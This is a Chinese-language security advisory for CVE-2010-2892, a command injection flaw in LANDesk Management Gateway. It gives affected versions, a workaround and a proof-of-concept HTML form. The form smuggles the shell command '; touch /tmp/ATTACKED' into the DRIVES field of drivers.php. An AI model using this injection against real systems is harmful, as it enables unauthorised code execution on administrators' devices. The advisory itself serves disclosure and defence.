LANDesk管理套件HTML表单请求命令注入漏洞
LANDesk管理套件HTML表单请求命令注入漏洞
发布日期:2010-11-09
更新日期:2010-11-11
受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.61
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.61s
不受影响系统:
LANDesk Software LANDesk Management Gateway 4.2 GSBWEB v1.62
LANDesk Software LANDesk Management Gateway 4.0 GSBWEB v1.62
描述:
--------------------------------------------------------------------------------
CVE ID: CVE-2010-2892
Landesk管理套件是一款网络管理系统,可控制桌面,服务器和移动设备等。
Landesk没有正确地验证提交特制请求的用户来源。如果管理员使用攻击者的浏览器登录到了设备,攻击者就可以以gsbadmin用户权限执行任意代码。
<*来源:Aureliano Calvo
链接:http://marc.info/?l=full-disclosure&m=128943189002312&w=2
http://secunia.com/advisories/42188/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/-----
<head><title>LANDesk PoC</title></head>
<body>
<form method="post" action="https://[server]/gsb/drivers.php">
<input type="text" name="DRIVES" value="; touch /tmp/ATTACKED">
<input type="text" name="SECONDTIME" value="1">
<input type="text" name="ACTION" value="getupdate">
<input type="submit" value="Attack!">
</form>
</body>
</html>
-----/
建议:
--------------------------------------------------------------------------------
临时解决方法:
1. 启动SSH控制台会话,或登录到LDMG控制台并启动终端会话。
2. 发布以下命令:mv/usr/LANDesk/broker/webroot/gsb/drivers.php ~
厂商补丁:
LANDesk Software
----------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: